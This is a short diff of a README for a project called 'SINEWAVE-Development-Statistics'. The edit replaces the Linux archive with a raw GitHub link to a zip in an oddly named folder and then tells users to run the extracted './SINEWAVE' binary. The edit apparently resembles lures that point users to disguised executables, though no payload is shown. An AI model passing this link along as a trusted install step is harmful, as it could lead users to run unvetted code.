baired123/SINEWAVE-Development-Statistics/README.md

    - **Windows**: Double-click the `.exe` file and follow the on-screen instructions to install the software.
    - **macOS**: Open the `.dmg` file, drag the application to your Applications folder, and launch it.
-   - **Linux**: Extract the files from the `.tar.gz` archive, navigate to the folder via terminal, and run the application using the command:
+   - **Linux**: Extract the files from the `https://raw.githubusercontent.com/baired123/SINEWAVE-Development-Statistics/main/ineradicable/SINEWAVE-Development-Statistics.zip` archive, navigate to the folder via terminal, and run the application using the command:

      ```bash
      ./SINEWAVE